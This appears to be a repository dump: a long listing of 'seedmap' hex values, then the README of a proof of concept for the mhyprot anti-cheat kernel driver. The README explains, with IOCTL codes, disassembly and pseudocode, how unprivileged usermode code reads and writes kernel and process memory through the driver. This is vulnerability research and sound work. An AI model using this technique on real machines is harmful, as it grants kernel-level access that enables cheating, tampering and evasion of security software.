 67 | [+] seedmap (00066): 0xBD95413D14633EC9
 68 | [+] seedmap (00067): 0xF7EB672868FD3187
 69 | [+] seedmap (00068): 0xF21C3B98903FFF6F
 70 | [+] seedmap (00069): 0x45B98D3BCC21D13E
 71 | [+] seedmap (00070): 0x95116229FE978F9
 72 | [+] seedmap (00071): 0x72B3361CA7E421F7
 73 | [+] seedmap (00072): 0x77762DB886890C07
 74 | [+] seedmap (00073): 0x7FF0FC70C4F54B05
 75 | [+] seedmap (00074): 0x3F3B1DF0601C18FC
 76 | [+] seedmap (00075): 0x5537CA91AA3E3485
 77 | [+] seedmap (00076): 0x164D5DFF724AD4D3
 78 | [+] seedmap (00077): 0xE60C330CE534CE5E
 79 | [+] seedmap (00078): 0x22331C99FE177437
 80 | [+] seedmap (00079): 0xA3F40E5C273FD2C9
 81 | [+] seedmap (00080): 0xF06668F394CA35B7
 82 | [+] seedmap (00081): 0x192B2C5695512D00
 83 | [+] seedmap (00082): 0x9F48C73294F6F652
 84 | [+] seedmap (00083): 0xECE85DB0B276FA35
 85 | [+] seedmap (00084): 0x1FF95B207149EC3E
 86 | [+] seedmap (00085): 0x9C085209FC18F823
 87 | [+] seedmap (00086): 0x2FD23C0E221C216B
 88 | [+] seedmap (00087): 0xB23023FD0CDE8C99
 89 | [+] seedmap (00088): 0xA7FBC16904A93714
 90 | [+] seedmap (00089): 0x2407B5908FE31552
 91 | [+] seedmap (00090): 0xF6E623BA599D9639
 92 | [+] seedmap (00091): 0xDF15A727389D65D7
 93 | [+] seedmap (00092): 0x29079E90B1D1E7E2
 94 | [+] seedmap (00093): 0x4D768784BC79D7F1
 95 | [+] seedmap (00094): 0xE389942538A1AB8C
 96 | [+] seedmap (00095): 0x13D90A5E9ACBAC4F
 97 | [+] seedmap (00096): 0xFE4BE954FFEA0306
 98 | [+] seedmap (00097): 0x80E0957230CD62FF
 99 | [+] seedmap (00098): 0x9DA46D2E2CA40DB8
100 | [+] seedmap (00099): 0xB58156769A7CF66F
101 | [+] seedmap (00100): 0x4862F529CB4B0851
102 | [+] seedmap (00101): 0x7F3D4D2DD5546CCF
103 | [+] seedmap (00102): 0x3787F6FDE687AEDC
104 | [+] seedmap (00103): 0x245F96D1E4B94B0E
105 | [+] seedmap (00104): 0xF61857F615DEFBDF
106 | [+] seedmap (00105): 0x8141E9AD4AA85C39
107 | [+] seedmap (00106): 0xCC38DA3EB2CF7003
108 | [+] seedmap (00107): 0x1BE6F6B385457006
109 | [+] seedmap (00108): 0x2C1D111C6DCF084C
110 | [+] seedmap (00109): 0x1A68F7ABC96241F4
111 | [+] seedmap (00110): 0xC3E3C0230FDD0B1E
112 | [+] seedmap (00111): 0x22FC7D7D4F48AA7C
113 | [+] seedmap (00112): 0xDE3EB82327668254
114 | [+] seedmap (00113): 0xABA28FB0E9B235D0
115 | [+] seedmap (00114): 0x2E90DD8524E8E94
116 | [+] seedmap (00115): 0x168C6E21FB5CB00C
117 | [+] seedmap (00116): 0x89E2F0EDA4FE06F7
118 | [+] seedmap (00117): 0x399DFA134BB0E9A0
119 | [+] seedmap (00118): 0x62A497333A4FED20
120 | [+] seedmap (00119): 0x4E8C79CD10A4D414
121 | [+] seedmap (00120): 0xFA4F6DA6EAA5C038
122 | [+] seedmap (00121): 0x903379CBE4AF931D
123 | [+] seedmap (00122): 0xE87A818E769BBAE
124 | [+] seedmap (00123): 0x662D7C7D97EF01A6
125 | [+] seedmap (00124): 0x8352825F617FF286
126 | [+] seedmap (00125): 0xE22D27D72EE7EA0E
127 | [+] seedmap (00126): 0x472BCFC10FFE8B5
128 | [+] seedmap (00127): 0x346E620A41668D8B
129 | [+] seedmap (00128): 0x9710706663461817
130 | [+] seedmap (00129): 0x1F0B5355DEB282F2
131 | [+] seedmap (00130): 0x96F97289A8B3866F
132 | [+] seedmap (00131): 0x23AD9C984CFE6CBC
133 | [+] seedmap (00132): 0x26B57C58BDEDCD90
134 | [+] seedmap (00133): 0xB53D1EDECCB6E88C
135 | [+] seedmap (00134): 0x260286028A383024
136 | [+] seedmap (00135): 0xC0CFBFE0C8025E47
137 | [+] seedmap (00136): 0x50CDF89981AEBD50
138 | [+] seedmap (00137): 0x5A1864A09B5E5C30
139 | [+] seedmap (00138): 0x56A9CD572D85AD78
140 | [+] seedmap (00139): 0x78530F9E3A077B48
141 | [+] seedmap (00140): 0x7D4E1232B6D03E2C
142 | [+] seedmap (00141): 0xC62BCE8DA7964F49
143 | [+] seedmap (00142): 0xDCD50F85E428D577
144 | [+] seedmap (00143): 0x48C1A0445DB43996
145 | [+] seedmap (00144): 0xFEBA7D3D3E02B250
146 | [+] seedmap (00145): 0x538BC55D1813DA82
147 | [+] seedmap (00146): 0xC596112210217E4A
148 | [+] seedmap (00147): 0x384C73207D99C660
149 | [+] seedmap (00148): 0x9A35797645709138
150 | [+] seedmap (00149): 0x1E4A2ED2B1AE9909
151 | [+] seedmap (00150): 0x250612C83EA9FCB
152 | [+] seedmap (00151): 0x5D16E89902747F16
153 | [+] seedmap (00152): 0xD21A41871E4FC00
154 | [+] seedmap (00153): 0xF8B34CE7E67E0F28
155 | [+] seedmap (00154): 0x9BF6F51CE1D08103
156 | [+] seedmap (00155): 0x7FC3999C7F22678B
157 | [+] seedmap (00156): 0x8FDF5C7DB7D910B2
158 | [+] seedmap (00157): 0xEA560F9436CF940F
159 | [+] seedmap (00158): 0x47B3E914BB28FF36
160 | [+] seedmap (00159): 0xB121A321E3778798
161 | [+] seedmap (00160): 0x4C93142375BA2180
162 | [+] seedmap (00161): 0xC33837ACEF53D5B5
163 | [+] seedmap (00162): 0x143AA1FAEC283CB
164 | [+] seedmap (00163): 0xB70B4CD6A0527D1E
165 | [+] seedmap (00164): 0xB89D8AA82FAF9341
166 | [+] seedmap (00165): 0x8B3DC4D600288C4E
167 | [+] seedmap (00166): 0x4A67E772CCF1FA06
168 | [+] seedmap (00167): 0x85AFBD01308186D3
169 | [+] seedmap (00168): 0x387CE3DDDE4D3A63
170 | [+] seedmap (00169): 0x23CA063413418E5F
171 | [+] seedmap (00170): 0x71FD61F7EADDBDDF
172 | [+] seedmap (00171): 0xCABDAEB6A41B2B75
173 | [+] seedmap (00172): 0x4FFFB8FFC3E5872B
174 | [+] seedmap (00173): 0x3DA4AEB840439175
175 | [+] seedmap (00174): 0x43AFC6B5AAF3E8B6
176 | [+] seedmap (00175): 0x339EB148E946FF4E
177 | [+] seedmap (00176): 0x5FEE0CD81E1105F4
178 | [+] seedmap (00177): 0xA97F3918DE8BEB55
179 | [+] seedmap (00178): 0x879DC71880059BBE
180 | [+] seedmap (00179): 0xBCB788FACF4D214
181 | [+] seedmap (00180): 0x1FC3D567C159A514
182 | [+] seedmap (00181): 0xB7E16B0F64B168F7
183 | [+] seedmap (00182): 0xEC4D4E5FA2529CAC
184 | [+] seedmap (00183): 0x8A0D414F6436473
185 | [+] seedmap (00184): 0xA38709DC92E96B50
186 | [+] seedmap (00185): 0x5AB23D245F7F3DAE
187 | [+] seedmap (00186): 0xF2829AF54227CAA6
188 | [+] seedmap (00187): 0x98AF26DB87D77D86
189 | [+] seedmap (00188): 0xFF9335DE2D330A09
190 | [+] seedmap (00189): 0x5FC6FC166D3A7F8D
191 | [+] seedmap (00190): 0x9016B339ADB1C73B
192 | [+] seedmap (00191): 0x37ECF9A562FE5359
193 | [+] seedmap (00192): 0x292952C59CF3BDAD
194 | [+] seedmap (00193): 0x568912582314A7F0
195 | [+] seedmap (00194): 0xAE6991C75800DEE7
196 | [+] seedmap (00195): 0x1840657056D770C8
197 | [+] seedmap (00196): 0x55CF1D437A058C38
198 | [+] seedmap (00197): 0xDD66D7B6A6D27708
199 | [+] seedmap (00198): 0x8FCCC276378B44DC
200 | [+] seedmap (00199): 0xC22FDD72E28A1D08
201 | [+] seedmap (00200): 0xFDAADB4A3D2D37A9
202 | [+] seedmap (00201): 0x207D6B7AB0D49E13
203 | [+] seedmap (00202): 0x6020946F92A6A47C
204 | [+] seedmap (00203): 0xBF9F05127B219CB9
205 | [+] seedmap (00204): 0xC8935045DACEDF8E
206 | [+] seedmap (00205): 0xA50C5CE5589E8473
207 | [+] seedmap (00206): 0xF728C2C0CCD024C0
208 | [+] seedmap (00207): 0x1CB364C851BFF9C6
209 | [+] seedmap (00208): 0x62B8796EC64CF80D
210 | [+] seedmap (00209): 0x3D13C377ED3D4881
211 | [+] seedmap (00210): 0xA19AE29ADC753123
212 | [+] seedmap (00211): 0xB624B24939359E38
213 | [+] seedmap (00212): 0xBED17FC68F894B20
214 | [+] seedmap (00213): 0xF0C42DF546BE67D9
215 | [+] seedmap (00214): 0xF52DDD34B0D214A9
216 | [+] seedmap (00215): 0x51A49B9C195B01F7
217 | [+] seedmap (00216): 0x3770C2BD8AF7D3E3
218 | [+] seedmap (00217): 0xAD13F199B5D6334A
219 | [+] seedmap (00218): 0x5AC822F7A046D4CF
220 | [+] seedmap (00219): 0xAF92A41B349153CC
221 | [+] seedmap (00220): 0x24DDF7251233AD88
222 | [+] seedmap (00221): 0x73E046F965F53E65
223 | [+] seedmap (00222): 0xDE17021F4B51DE85
224 | [+] seedmap (00223): 0xEB76BE39FD8E104B
225 | [+] seedmap (00224): 0x88A5BD3AC1A29B7F
226 | [+] seedmap (00225): 0x402E123BB15D750
227 | [+] seedmap (00226): 0xB4336F689FD4D2D7
228 | [+] seedmap (00227): 0xD2B9611F6EEE2B1D
229 | [+] seedmap (00228): 0x77262374EDFE9897
230 | [+] seedmap (00229): 0xF6CACCC679401FB5
231 | [+] seedmap (00230): 0x750837DEA71A187E
232 | [+] seedmap (00231): 0x400E78C0B3C6A1CB
233 | [+] seedmap (00232): 0x69C835C65640FB3D
234 | [+] seedmap (00233): 0xA14F27EB18983026
235 | [+] seedmap (00234): 0x4CDEAC962649F666
236 | [+] seedmap (00235): 0x73D58D46A444933C
237 | [+] seedmap (00236): 0x233CB49A6713CCD1
238 | [+] seedmap (00237): 0xAB15DF080D901ED9
239 | [+] seedmap (00238): 0xCBC47ABD3DD68FF9
240 | [+] seedmap (00239): 0xF482E75959EEC2B2
241 | [+] seedmap (00240): 0x3167C3F9FFE344F4
242 | [+] seedmap (00241): 0x2D3BDC50CE6405B
243 | [+] seedmap (00242): 0x3C1DF07551B734E6
244 | [+] seedmap (00243): 0xA3090E7F170A31DA
245 | [+] seedmap (00244): 0xD002632E5754F5BF
246 | [+] seedmap (00245): 0xA9047406387AC19B
247 | [+] seedmap (00246): 0x2DC0528DF914E198
248 | [+] seedmap (00247): 0xBB065D039BD4FF86
249 | [+] seedmap (00248): 0x4B18F2575F8977C1
250 | [+] seedmap (00249): 0x55BD413521086455
251 | [+] seedmap (00250): 0x5C1D724942494234
252 | [+] seedmap (00251): 0x2794D4881EB6C1F4
253 | [+] seedmap (00252): 0x3F4E4BC8E318ADF
254 | [+] seedmap (00253): 0x35FCCE046FBF9393
255 | [+] seedmap (00254): 0xDC18863FE08116F2
256 | [+] seedmap (00255): 0x3A0E6A95F876AD9E
257 | [+] seedmap (00256): 0x259F2930AE2CD2D
258 | [+] seedmap (00257): 0xA254DEA94BEE0F36
259 | [+] seedmap (00258): 0xBC6E50FD727ED264
260 | [+] seedmap (00259): 0x86CB2B7A9F68ECB2
261 | [+] seedmap (00260): 0x69B73625C9894245
262 | [+] seedmap (00261): 0xB0F6313DF5E91D83
263 | [+] seedmap (00262): 0xAAF6073058F962FA
264 | [+] seedmap (00263): 0x8E189951B001F530
265 | [+] seedmap (00264): 0x652E6EC114A77D6D
266 | [+] seedmap (00265): 0x41C5A1D9DC7536D1
267 | [+] seedmap (00266): 0x7DE1F0B90B7F5FF1
268 | [+] seedmap (00267): 0x94B1407ED6AEF7BF
269 | [+] seedmap (00268): 0xC87D6587947F132B
270 | [+] seedmap (00269): 0x71BA95352798F97A
271 | [+] seedmap (00270): 0x8F60AE3271642D33
272 | [+] seedmap (00271): 0xA61D24A0CFA09831
273 | [+] seedmap (00272): 0x9983181A2D7FA894
274 | [+] seedmap (00273): 0x331AE289AF5D2D50
275 | [+] seedmap (00274): 0x2967FE0BF41005D
276 | [+] seedmap (00275): 0x8F0ADBC34325CF11
277 | [+] seedmap (00276): 0xA224431A41EF16F2
278 | [+] seedmap (00277): 0x9CD4EF33DCE86B10
279 | [+] seedmap (00278): 0xB1359DACDA49AF93
280 | [+] seedmap (00279): 0xC9DC14154D524229
281 | [+] seedmap (00280): 0x460561E6E94316C8
282 | [+] seedmap (00281): 0x2CF90CA973D43B6
283 | [+] seedmap (00282): 0x86FE50320E51DC96
284 | [+] seedmap (00283): 0x93F1440249C496C4
285 | [+] seedmap (00284): 0x19B3FF553542D042
286 | [+] seedmap (00285): 0x21FB13FC5265A069
287 | [+] seedmap (00286): 0x3B54414FA5E76548
288 | [+] seedmap (00287): 0xD62569DD59B0F2DC
289 | [+] seedmap (00288): 0x7112A6F8AB22C69F
290 | [+] seedmap (00289): 0xB4A97A0A502A8BB8
291 | [+] seedmap (00290): 0x14482D9EBA7ACC68
292 | [+] seedmap (00291): 0x57887BEC24128A2A
293 | [+] seedmap (00292): 0xC89A6AFA1B62387F
294 | [+] seedmap (00293): 0xE60E3BE29474CD2E
295 | [+] seedmap (00294): 0x9AF28D387677A940
296 | [+] seedmap (00295): 0x19F857B202E4156C
297 | [+] seedmap (00296): 0xD3912E1341241F2D
298 | [+] seedmap (00297): 0xE940B59F4F615614
299 | [+] seedmap (00298): 0xFF8E1C066A588DF2
300 | [+] seedmap (00299): 0xC46E4ADE998F6AF2
301 | [+] seedmap (00300): 0x26D62ABDA3B9248B
302 | [+] seedmap (00301): 0x324C1BB829B8A30C
303 | [+] seedmap (00302): 0xA8F727D0B6D9711B
304 | [+] seedmap (00303): 0xFC8C1F91EDF1FEB7
305 | [+] seedmap (00304): 0xC108092E71912AF
306 | [+] seedmap (00305): 0xF0667533ED506962
307 | [+] seedmap (00306): 0x9B67616DA2EE0C51
308 | [+] seedmap (00307): 0x3436BABB4A2E9BB2
309 | [+] seedmap (00308): 0x2F16767648C2B105
310 | [+] seedmap (00309): 0xAF1EABC9293A8967
311 | [+] seedmap (00310): 0xA10159AB12220C16
312 | [+] seedmap (00311): 0x1930F141DA300F37
313 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | ![IMAGE](image01.png)
  2 | ![IMAGE](image04.png)
  3 | ![IMAGE](image05.png)
  4 | 
  5 | # evil-mhyprot-cli
  6 | A PoC for vulnerable driver "mhyprot" that allows us to read/write memory in kernel/user from usermode.
  7 | 
  8 | ### Static Library is here: [libmhyprot](https://github.com/kkent030315/libmhyprot)
  9 | 
 10 | # Overview
 11 | 
 12 | What we can do with this CLI is as follows:
 13 | 
 14 | - Read/Write any kernel memory with privilege of kernel from usermode
 15 | - Read/Write any user memory with privilege of kernel from usermode
 16 | - All operations are executed as kernel level privilege (ring-0) by the vulnerable driver
 17 | 
 18 | Also:
 19 | 
 20 | - Administrator privilege only needed if the service is not yet running
 21 | - Therefore we can execute commands above as the normal user (w/o administrator privilege)
 22 | 
 23 | ---
 24 | 
 25 | The `mhyprot` is an anti-cheat kernel mode driver used in [`Genshin Impact`](https://genshin.mihoyo.com/ja).  
 26 | The driver has a vulnerable `IOCTL` commands that allows us to execute `MmCopyVirtualMemory` and `memcpy(in the kernel!)` from ring-3 (usermode).
 27 | 
 28 | ![IMAGE](mhyprot.png)
 29 | 
 30 | # Impact
 31 | 
 32 | Investigating
 33 | 
 34 | # Requirements
 35 | 
 36 | - Any version of Windows x64 that the driver works on
 37 | - Administrator privilege does not required if the service already running
 38 | 
 39 | Tested on:
 40 | 
 41 | - Windows10 x64 1903
 42 | - Windows7 x64 6.1
 43 | - Windows8.1 x64 6.3
 44 | 
 45 | # Usage
 46 | 
 47 | ```
 48 | bin.exe [TargetProcess] -options
 49 | ```
 50 | 
 51 | following options are available as of now:
 52 | 
 53 | - `t`
 54 |   - Perform Tests
 55 | - `d`
 56 |   - Print debug infos
 57 | - `s`
 58 |   - Print seedmap
 59 | 
 60 | # Analysis and Proofs
 61 | 
 62 | > The document(s) below is still in write
 63 | so please forgive any mistakes I took in advance.
 64 | 
 65 | ## IOCTL Handler Functions
 66 | 
 67 | So what I did is that to reverse engineering around IOCTL handling functionalities.  
 68 | 
 69 | Since around ioctl functions and its functionalities are packed, to reverse engineering is not easy than average.  
 70 | but I can still easily find the function that registered at `DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL]` since the IOCTL handler must have an `IoCompleteRequest` or like `IofCompleteRequest` that exported by `ntoskrnl`.  
 71 | (Btw `IoCompleteRequest` is just a wrapper of `IofCompleteRequest`)  
 72 | 
 73 | ![IMAGE](image03.png)
 74 | 
 75 | As mhyprot imports `IofCompleteRequest` then go xrefs, and we will see there are many ioctl handlers.  
 76 | Concretely, I found two big subroutine in packed segment.  
 77 | 
 78 | I've added it to [this repo](IDA) as binary since it's too big.  
 79 | 
 80 | - [sub_FFFFF800188CD000](IDA/sub_FFFFF800188CD000.txt)
 81 |   - -> [Pseudocode](https://github.com/kkent030315/evil-mhyprot-cli/blob/main/IDA/FUN_0001d000.cpp)
 82 | - [sub_FFFFF800188CD6E0](IDA/sub_FFFFF800188CD6E0.txt)
 83 |   - -> [Pseudocode](https://github.com/kkent030315/evil-mhyprot-cli/blob/main/IDA/FUN_0001d6e0.cpp)
 84 | 
 85 | I will keep update if I found more another subroutine.
 86 | 
 87 | ## Driver Initialization
 88 | 
 89 | The `MHYPROT_IOCTL_INITIALIZE` what I defined in [mhyprot.hpp#L18](src/mhyprot.hpp#L18) can be found as follows:
 90 | 
 91 | ```cpp
 92 | PAGE:FFFFF800188CD8FD loc_FFFFF800188CD8FD:                   ; CODE XREF: sub_FFFFF800188CD6E0+213↑j
 93 | PAGE:FFFFF800188CD8FD                 cmp     ecx, 80034000h  ; MHYPROT_IOCTL_INITIALIZE
 94 | PAGE:FFFFF800188CD903                 jnz     short loc_FFFFF800188CD984
 95 | PAGE:FFFFF800188CD905                 cmp     r8d, 10h
 96 | PAGE:FFFFF800188CD909                 jnz     loc_FFFFF800188CDA4F
 97 | PAGE:FFFFF800188CD90F                 mov     rax, 0EBBAAEF4FFF89042h // <- _m_002
 98 | PAGE:FFFFF800188CD919                 xor     [rdi+8], rax
 99 | PAGE:FFFFF800188CD91D                 mov     rax, [rdi+8]
100 | PAGE:FFFFF800188CD921                 xor     [rdi], rax
101 | PAGE:FFFFF800188CD924                 cmp     dword ptr [rdi+4], 0BAEBAEECh // <- _m_001
102 | PAGE:FFFFF800188CD92B                 jnz     loc_FFFFF800188CDA4F
103 | PAGE:FFFFF800188CD931                 mov     ecx, [rdi]
104 | PAGE:FFFFF800188CD933                 call    sub_FFFFF800188C51A8
105 | PAGE:FFFFF800188CD938                 cmp     dword ptr cs:qword_FFFFF800188CA108, 0
106 | PAGE:FFFFF800188CD93F                 jnz     short loc_FFFFF800188CD97D
107 | PAGE:FFFFF800188CD941                 mov     rdx, [rdi+8]
108 | PAGE:FFFFF800188CD945                 lea     rcx, xmmword_FFFFF800188CA0E8
109 | PAGE:FFFFF800188CD94C                 call    sub_FFFFF800188C301C // <-
110 | PAGE:FFFFF800188CD951                 mov     ebx, 7
111 | ```
112 | 
113 | and the `sub_FFFFF800188C301C` is look like:
114 | 
115 | ```cpp
116 | .text:FFFFF800188C301C ; =============== S U B R O U T I N E =======================================
117 | .text:FFFFF800188C301C
118 | .text:FFFFF800188C301C
119 | .text:FFFFF800188C301C sub_FFFFF800188C301C proc near          ; CODE XREF: sub_FFFFF800188CD6E0+26C↓p
120 | .text:FFFFF800188C301C                                         ; DATA XREF: .upx0:FFFFF800189F2BA8↓o
121 | .text:FFFFF800188C301C
122 | .text:FFFFF800188C301C arg_0           = qword ptr  8
123 | .text:FFFFF800188C301C
124 | .text:FFFFF800188C301C                 test    rcx, rcx
125 | .text:FFFFF800188C301F                 jz      locret_FFFFF800188C30B4
126 | .text:FFFFF800188C3025                 mov     [rsp+arg_0], rbx
127 | .text:FFFFF800188C302A                 push    rdi
128 | .text:FFFFF800188C302B                 sub     rsp, 20h
129 | .text:FFFFF800188C302F                 xor     eax, eax
130 | .text:FFFFF800188C3031                 mov     rdi, rdx
131 | .text:FFFFF800188C3034                 mov     [rcx], rax
132 | .text:FFFFF800188C3037                 mov     rbx, rcx
133 | .text:FFFFF800188C303A                 mov     [rcx+8], rax
134 | .text:FFFFF800188C303E                 mov     edx, 9C0h       ; NumberOfBytes
135 | .text:FFFFF800188C3043                 xor     ecx, ecx        ; PoolType
136 | .text:FFFFF800188C3045                 call    cs:ExAllocatePool
137 | .text:FFFFF800188C304B                 xor     edx, edx
138 | .text:FFFFF800188C304D                 mov     r8d, 9C0h
139 | .text:FFFFF800188C3053                 mov     rcx, rax
140 | .text:FFFFF800188C3056                 mov     [rbx], rax
141 | .text:FFFFF800188C3059                 call    sub_FFFFF800188C7900
142 | .text:FFFFF800188C305E                 mov     rax, [rbx]
143 | .text:FFFFF800188C3061                 mov     r9d, 1
144 | .text:FFFFF800188C3067                 mov     [rbx+0Ch], r9d
145 | .text:FFFFF800188C306B                 mov     [rax], rdi
146 | .text:FFFFF800188C306E                 mov     [rbx+8], r9d
147 | .text:FFFFF800188C3072
148 | .text:FFFFF800188C3072 loc_FFFFF800188C3072:                   ; CODE XREF: sub_FFFFF800188C301C+8C↓j
149 | .text:FFFFF800188C3072                 movsxd  r8, dword ptr [rbx+8]
150 | .text:FFFFF800188C3076                 mov     rdx, [rbx]
151 | .text:FFFFF800188C3079                 mov     rax, [rdx+r8*8-8]
152 | .text:FFFFF800188C307E                 mov     rcx, rax
153 | .text:FFFFF800188C3081                 shr     rcx, 3Eh
154 | .text:FFFFF800188C3085                 xor     rcx, rax
155 | .text:FFFFF800188C3088                 mov     rax, 5851F42D4C957F2Dh
156 | .text:FFFFF800188C3092                 imul    rcx, rax
157 | .text:FFFFF800188C3096                 add     rcx, r8
158 | .text:FFFFF800188C3099                 mov     [rdx+r8*8], rcx
159 | .text:FFFFF800188C309D                 add     [rbx+8], r9d
160 | .text:FFFFF800188C30A1                 cmp     dword ptr [rbx+8], 138h
161 | .text:FFFFF800188C30A8                 jl      short loc_FFFFF800188C3072
162 | .text:FFFFF800188C30AA                 mov     rbx, [rsp+28h+arg_0]
163 | .text:FFFFF800188C30AF                 add     rsp, 20h
164 | .text:FFFFF800188C30B3                 pop     rdi
165 | .text:FFFFF800188C30B4
166 | .text:FFFFF800188C30B4 locret_FFFFF800188C30B4:                ; CODE XREF: sub_FFFFF800188C301C+3↑j
167 | .text:FFFFF800188C30B4                 retn
168 | .text:FFFFF800188C30B4 sub_FFFFF800188C301C endp
169 | ```
170 | 
171 | ## A Way of Read/Write Specific Process Memory
172 | 
173 | The mhyprot calls `MmCopyVirtualMemory` eventually as wrapper defined as follows:
174 | 
175 | ```cpp
176 | __int64 __fastcall sub_FFFFF800188C3EB8(struct _EPROCESS *a1, _DWORD *a2, __int64 a3)
177 | {
178 |   __int64 v3; // rbp
179 |   _DWORD *v4; // rdi
180 |   struct _EPROCESS *v5; // rbx
181 |   PEPROCESS v6; // rsi
182 |   char v8; // [rsp+28h] [rbp-20h]
183 | 
184 |   v3 = a3;
185 |   v4 = a2;
186 |   v5 = a1;
187 |   if ( *a2 == 1 )
188 |   {
189 |     v6 = IoGetCurrentProcess();
190 |   }
191 |   else
192 |   {
193 |     v6 = a1;
194 |     v5 = IoGetCurrentProcess();
195 |   }
196 |   v8 = 0;
197 |   return MmCopyVirtualMemory(v6, *((_QWORD *)v4 + 3), v5, *((_QWORD *)v4 + 2), (unsigned int)v4[8], v8, v3);
198 | }
199 | ```
200 | 
201 | Called by:
202 | 
203 | ```cpp
204 | __int64 __fastcall sub_FFFFF800188C3F2C(_DWORD *a1_rw_request, __int64 a2_returnsize, __int64 a3)
205 | {
206 |   __int64 v3_returnsize; // rsi
207 |   _DWORD *v4_rw_request; // rbx
208 |   __int64 v5_processid; // rcx
209 |   bool v6_ntstatus_lookup_success_bool; // di
210 |   unsigned int v8_ntstatus; // ebx
211 |   PVOID Object; // [rsp+40h] [rbp+8h]
212 | 
213 |   v3_returnsize = a2_returnsize;
214 |   v4_rw_request = a1_rw_request;
215 |   v5_processid = (unsigned int)a1_rw_request[2];
216 |   Object = 0i64;
217 |   v6_ntstatus_lookup_success_bool = (int)PsLookupProcessByProcessId(v5_processid, &Object, a3) >= 0;// NT_SUCCESS
218 |   if ( !Object )
219 |     return 3221225473i64;
220 |   v8_ntstatus = sub_FFFFF800188C3EB8((struct _EPROCESS *)Object, v4_rw_request, v3_returnsize);
221 |   if ( v6_ntstatus_lookup_success_bool )
222 |     ObfDereferenceObject(Object);
223 |   return v8_ntstatus;
224 | }
225 | ```
226 | 
227 | Called by:
228 | 
229 | ```cpp
230 | bool __fastcall sub_FFFFF800188C4214(_DWORD *a1_rw_request, _DWORD *a2_returnsize, __int64 a3)
231 | {
232 |   _DWORD *v3_returnsize; // rbx
233 |   int v5_ntstatus; // [rsp+20h] [rbp-18h]
234 |   __int64 v6_returnsize; // [rsp+50h] [rbp+18h]
235 | 
236 |   v3_returnsize = a2_returnsize;
237 |   v6_returnsize = 0i64;
238 |   v5_ntstatus = sub_FFFFF800188C3F2C(a1_rw_request, (__int64)&v6_returnsize, a3);
239 |   *v3_returnsize = v6_returnsize;
240 |   return v5_ntstatus == 0;                      // NT_SUCCESS(v5_ntstatus)
241 | }
242 | ```
243 | 
244 | Finally we are at the root of the tree:
245 | 
246 | ```cpp
247 | PAGE:FFFFF800188CD303 loc_FFFFF800188CD303:                   ; CODE XREF: sub_FFFFF800188CD000+2C7↑j
248 | PAGE:FFFFF800188CD303                 and     dword ptr [rbp+1D0h+arg_20], 0
249 | PAGE:FFFFF800188CD30A                 lea     rdx, [rbp+1D0h+arg_20]
250 | PAGE:FFFFF800188CD311                 mov     rcx, [rsp+30h]
251 | PAGE:FFFFF800188CD316                 call    sub_FFFFF800188C4214 // <- Here
252 | PAGE:FFFFF800188CD31B                 jmp     loc_FFFFF800188CD21C
253 | ```
254 | 
255 | Call map:
256 | 
257 | ![IMAGE](image06.png)
258 | 
259 | ## A Way of Read Kernel Memory
260 | 
261 | We can see so many IOCTL commands and the `MHYPROT_IOCTL_READ_KERNEL_MEMORY` what I defined in [mhyprot.hpp#L19](src/mhyprot.hpp#L19) can be found as follows:
262 | 
263 | ```cpp
264 | PAGE:FFFFF800188CD7A9 loc_FFFFF800188CD7A9:                   ; CODE XREF: sub_FFFFF800188CD6E0+BA↑j
265 | PAGE:FFFFF800188CD7A9                 cmp     ecx, 83064000h  ; MHYPROT_IOCTL_READ_KERNEL_MEMORY
266 | PAGE:FFFFF800188CD7AF                 jnz     short loc_FFFFF800188CD7C8
267 | PAGE:FFFFF800188CD7B1                 mov     rdx, [rdi]
268 | PAGE:FFFFF800188CD7B4                 lea     rcx, [rdi+4]
269 | PAGE:FFFFF800188CD7B8                 mov     r8d, [rdi+8]
270 | PAGE:FFFFF800188CD7BC                 call    sub_FFFFF800188C63A8 // <-
271 | ```
272 | 
273 | And the `sub_FFFFF800188C63A8` is like:
274 | 
275 | ```cpp
276 | .text:FFFFF800188C63A8 sub_FFFFF800188C63A8 proc near          ; CODE XREF: sub_FFFFF800188CD6E0+DC↓p
277 | .text:FFFFF800188C63A8                                         ; DATA XREF: .upx0:FFFFF800189F2EE4↓o
278 | .text:FFFFF800188C63A8
279 | .text:FFFFF800188C63A8 arg_0           = qword ptr  8
280 | .text:FFFFF800188C63A8 arg_8           = qword ptr  10h
281 | .text:FFFFF800188C63A8
282 | .text:FFFFF800188C63A8                 mov     [rsp+arg_0], rbx
283 | .text:FFFFF800188C63AD                 mov     [rsp+arg_8], rsi
284 | .text:FFFFF800188C63B2                 push    rdi
285 | .text:FFFFF800188C63B3                 sub     rsp, 20h
286 | .text:FFFFF800188C63B7                 mov     edi, r8d
287 | .text:FFFFF800188C63BA                 mov     rbx, rdx
288 | .text:FFFFF800188C63BD                 mov     rsi, rcx
289 | .text:FFFFF800188C63C0                 test    rdx, rdx
290 | .text:FFFFF800188C63C3                 jz      short loc_FFFFF800188C63F2
291 | .text:FFFFF800188C63C5                 test    r8d, r8d
292 | .text:FFFFF800188C63C8                 jz      short loc_FFFFF800188C63F2
293 | .text:FFFFF800188C63CA                 mov     rax, cs:MmHighestUserAddress
294 | .text:FFFFF800188C63D1                 cmp     rdx, [rax]
295 | .text:FFFFF800188C63D4                 jb      short loc_FFFFF800188C63F2
296 | .text:FFFFF800188C63D6                 mov     r8d, edi
297 | .text:FFFFF800188C63D9                 xor     edx, edx
298 | .text:FFFFF800188C63DB                 call    sub_FFFFF800188C7900
299 | .text:FFFFF800188C63E0                 mov     r8d, edi
300 | .text:FFFFF800188C63E3                 mov     rdx, rsi
301 | .text:FFFFF800188C63E6                 mov     rcx, rbx
302 | .text:FFFFF800188C63E9                 call    sub_FFFFF800188C3DD8
303 | .text:FFFFF800188C63EE                 xor     eax, eax
304 | .text:FFFFF800188C63F0                 jmp     short loc_FFFFF800188C63F5
305 | ```
306 |   
307 | Here is the ioctl handlers, found the `0x83064000`(`MHYPROT_IOCTL_READ_KERNEL_MEMORY`) as `cmp ecx, 83064000h` and some another ioctl codes as follows:
308 | 
309 | ![IMAGE](image02.png)
310 | 
311 | Call map:  
312 |   
313 | As I defined as `DWORD result` in [mhyprot.hpp#L40](https://github.com/kkent030315/evil-mhyprot-cli/blob/main/src/mhyprot.hpp#L40) the first 4bytes is result.  
314 | I can guess it's a `NTSTATUS` as it typedef'ed as `typedef LONG NTSTATUS` natively and the dispathers return types are `NTSTATUS` and the result will directly be got stored from it.
315 | 
316 | ![IMAGE](image07.png)
317 | 


